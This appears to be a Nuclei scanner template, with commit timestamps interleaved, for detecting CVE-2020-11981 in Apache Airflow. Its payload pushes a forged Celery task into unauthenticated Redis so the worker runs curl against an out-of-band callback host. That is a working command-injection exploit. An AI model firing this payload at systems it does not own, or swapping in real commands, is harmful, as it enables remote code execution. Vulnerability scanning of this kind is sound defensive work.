2023-05-16 16:29:43 +00:00
id : CVE-2020-11981
info :
2023-05-16 18:09:07 +00:00
name : Apache Airflow <=1.10.10 - Command Injection
2023-05-16 16:29:43 +00:00
author : pussycat0x
severity : critical
description : |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
reference :
2023-05-16 20:33:10 +00:00
- https://github.com/apache/airflow/pull/9178
2023-05-17 13:16:14 +00:00
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
2023-08-17 18:29:31 +00:00
remediation : Upgrade apache-airflow to version 1.10.11 or higher.
2023-05-29 11:32:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-06-03 18:56:35 +00:00
cvss-score : 9.8
2023-05-29 11:32:09 +00:00
cve-id : CVE-2020-11981
cwe-id : CWE-78
2023-09-27 13:29:58 +00:00
epss-score : 0.93693
2023-05-16 16:29:43 +00:00
metadata :
2023-09-27 13:29:58 +00:00
max-request : 1
2023-05-16 20:33:10 +00:00
shodan-query : product:"redis"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-31 15:39:04 +00:00
tags : cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
2023-05-16 16:29:43 +00:00
variables :
2023-05-16 20:33:10 +00:00
data : "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
2023-05-17 13:16:14 +00:00
encode1 : '[[["curl", "http://'
encode2 : '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
2023-05-16 20:33:10 +00:00
end : '"}'
2023-05-16 16:29:43 +00:00
tcp :
- inputs :
2023-05-17 13:16:14 +00:00
- data : "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
2023-05-16 18:09:07 +00:00
read : 1024
2023-05-16 16:29:43 +00:00
host :
- "{{Hostname}}"
2023-09-16 19:35:21 +00:00
port : 6379
2023-05-16 16:29:43 +00:00
2023-06-13 08:52:29 +00:00
matchers-condition : and
2023-05-16 16:29:43 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
2023-05-16 20:33:10 +00:00
- "http"
2023-05-18 09:28:30 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: curl"